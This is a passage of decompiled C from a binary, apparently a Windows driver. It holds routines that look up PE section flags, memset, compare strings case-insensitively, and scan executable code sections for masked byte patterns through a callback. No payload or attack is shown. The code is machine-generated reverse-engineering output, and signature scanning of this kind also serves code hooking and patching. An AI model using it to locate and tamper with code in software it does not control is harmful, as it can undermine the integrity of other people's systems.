v6 = *(_DWORD *)(v5 + 8);

if ( v6 >= *(_DWORD *)(v5 + 16) )

v6 = *(_DWORD *)(v5 + 16);

v7 = *(_DWORD *)(v5 + 12);

if ( a2 >= v7 )

{

if ( a2 < v6 + v7 )

break;

}

++v4;

if ( (_WORD)v4 >= v9 )

goto LABEL_14;

}

v8 = *(_DWORD *)(40 * (unsigned __int16)v4 + v2 + 36);

if ( v8 & 0x2000000 || !(v8 & 0x40000000) )

LABEL_14:

result = 0;

else

LABEL_17:

result = 1;

}

else

{

result = 0;

}

return result;

}

//----- (00013BF1) --------------------------------------------------------

int __usercall sub_13BF1<eax>(unsigned int a1<eax>, int a2<ecx>, int a3, int a4, int a5)

{

int v5; // ecx@1

int v6; // edi@1

int v7; // esi@1

int result; // eax@2

int v9; // eax@4

int v10; // ebx@4

unsigned int v11; // [sp+Ch] [bp-4h]@1

v6 = a2 + 4;

v5 = a2 + a1 - 13;

v7 = a1 - 4;

v11 = v5;

if ( a1 >= 0xD )

{

if ( v6 <= (unsigned int)v5 )

{

do

{

v9 = v7 + v6 - 4;

v10 = v6;

if ( v6 > (unsigned int)v9 )

{

LABEL_7:

v10 = 0;

}

else

{

while ( *(_DWORD *)v10 != a3 )

{

++v10;

if ( v10 > (unsigned int)v9 )

goto LABEL_7;

}

}

if ( !v10 || v10 - 4 > v11 )

break;

if ( sub_13C66(a5, a4, v10 - 4, 0xDu) )

return v10 - 4;

v7 = v7 + v6 - v10 - 1;

v6 = v10 + 1;

}

while ( v10 + 1 <= v11 );

}

result = 0;

}

else

{

result = 0;

}

return result;

}

//----- (00013C66) --------------------------------------------------------

signed int __usercall sub_13C66<eax>(int a1<eax>, int a2<edx>, int a3<ecx>, unsigned int a4)

{

unsigned int v4; // edi@1

int v5; // ecx@2

int v6; // esi@2

signed int result; // eax@5

v4 = 0;

if ( a4 )

{

v5 = a3 - a1;

v6 = a2 - a1;

while ( (*(_BYTE *)a1 & *(_BYTE *)(v5 + a1)) == *(_BYTE *)(v6 + a1) )

{

++v4;

++a1;

if ( v4 >= a4 )

goto LABEL_5;

}

result = 0;

}

else

{

LABEL_5:

result = 1;

}

return result;

}

//----- (00013C92) --------------------------------------------------------

int __cdecl sub_13C92(int a1, char a2, int a3)

{

int v3; // eax@2

int v5; // [sp+0h] [bp-4h]@1

v5 = a1;

while ( 1 )

{

v3 = a3--;

if ( !v3 )

break;

*(_BYTE *)a1++ = a2;

}

return v5;

}

//----- (00013CC0) --------------------------------------------------------

int __usercall sub_13CC0<eax>(int a1<eax>, int a2<edx>)

{

int v2; // esi@1

int v3; // eax@2

int v4; // ecx@4

v2 = a1;

do

{

v3 = *(_BYTE *)v2++;

if ( (unsigned int)(v3 - 65) <= 0x19 )

v3 += 32;

v4 = *(_BYTE *)a2++;

if ( (unsigned int)(v4 - 65) <= 0x19 )

v4 += 32;

}

while ( v3 && v3 == v4 );

return v3 - v4;

}

//----- (00013D8E) --------------------------------------------------------

signed int __usercall sub_13D8E<eax>(int a1<eax>, int a2, int a3, unsigned int a4, int (__cdecl *a5)(_DWORD, _DWORD, _DWORD))

{

unsigned int v5; // ebx@1

int v6; // esi@2

int v7; // eax@5

signed int result; // eax@9

v5 = 0;

if ( a4 )

{

v6 = a1 + 8;

while ( 1 )

{

if ( (*(_DWORD *)(v6 + 28) & 0x60000020) == 1610612768 )

{

if ( !(*(_DWORD *)(v6 + 28) & 0x2000000) )

{

v7 = *(_DWORD *)v6;

if ( *(_DWORD *)v6 >= *(_DWORD *)(v6 + 8) )

v7 = *(_DWORD *)(v6 + 8);

if ( a5(*(_DWORD *)(a2 + 33) + *(_DWORD *)(v6 + 4), v7, a3) )

break;

}

}

++v5;

v6 += 40;

if ( v5 >= a4 )

goto LABEL_9;

}

result = 1;

}

else

{

LABEL_9:

result = 0;

}

return result;

}